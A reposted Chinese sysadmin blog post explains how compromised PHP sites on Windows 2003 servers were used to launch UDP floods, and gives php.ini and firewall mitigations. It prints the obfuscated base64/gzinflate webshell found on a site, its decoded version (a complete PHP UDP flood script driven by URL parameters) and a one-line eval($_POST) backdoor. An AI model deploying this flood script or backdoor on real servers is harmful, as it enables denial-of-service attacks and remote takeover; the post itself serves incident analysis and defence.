win2003遭受udp攻擊導致帶寬占用很大

2024-09-01 13:45:39

字體：大中小

來源：轉載

供稿：網友

后來發現在一個網站里面發現一個加密的.解密后看到很熟悉的 udp 莫非有關系?.果然也有朋友遇到這樣的情況,看來封禁對外udp是很必要的,

以下為轉帖:

關于近期一些服務器遭受UDP攻擊的說明
近來我有一兩臺服務器顯示經常受到udp攻擊
導致服務器帶寬占用到100%，用華盾查流量占用也無法查到具體是哪個站被攻擊了，起初以為是cc攻擊，因為停止了iis帶寬就為0了，其實不然，都是部分用戶被入侵導致的
下面我想說一下被入侵的原理
用戶程序中的一個php頁面的原代碼:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
經過N次解密后的代碼：

復制代碼代碼如下:

<?php
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand <br><br>/";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>
<?php eval($_POST[ddos])?>

baidu了一下工作原理：
先把你代碼放到一個正常的網頁中.
通過url傳遞IP和端口以udp的方式打開.傳遞文件到服務器寫出.
這樣服務器就中招了.
也就是服務器顯示udp攻擊，帶寬占用非常之嚴重，基本是100%，一般徘徊在97%-99%之間
解決方案：
在php.ini中限制php用網絡。
在php.ini里設其值為Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;號一定要有,意思就是限制用sockets.dll
然后重啟IIS
我沒關這個函數,有的程序需要貌似,直接把udp出站端口給封了.

上一篇：如何讓32位的WIN2003服務器使用4G以上內存的方法

下一篇：備份mssql數據庫的批處理